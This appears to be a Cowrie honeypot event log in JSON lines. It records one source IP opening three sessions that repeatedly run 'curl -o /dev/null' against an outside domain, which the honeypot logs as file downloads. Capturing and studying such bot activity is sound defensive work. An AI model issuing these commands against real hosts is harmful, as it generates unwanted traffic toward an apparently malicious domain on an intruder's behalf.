{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.533584Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.537994Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.563982Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.564960Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.565667Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.569222Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.570976Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.571692Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.573401Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.574636Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.576795Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.605163Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.606103Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.606627Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.610081Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.611419Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.611984Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.614751Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.615162Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.620987Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.647280Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.649211Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.651093Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.652631Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.653549Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.655970Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.656639Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.658595Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.659423Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.692359Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.693581Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.694094Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.697852Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.700125Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.701746Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.702704Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.704593Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.705080Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.755557Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.756450Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.760888Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.763827Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.764689Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.765191Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.768448Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.771000Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.773148Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.773843Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.810293Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.811018Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.814891Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.815303Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.817882Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.819447Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.820165Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.823258Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.850157Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.850876Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.858235Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.858916Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.860191Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.861055Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.887483Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.888240Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.892090Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.894512Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.897390Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.900986Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.902869Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.904876Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.908101Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.909587Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.910157Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.911792Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.912396Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.938525Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.939295Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","shasum":"2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","sensor":"my-vps","timestamp":"2025-08-31T09:00:48.945511Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091 to var/lib/cowrie/downloads/2cdb06aaffbf346caa07942dcf6ceda1862322afbb442f43891ebf67ea2af091","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:48.972560Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
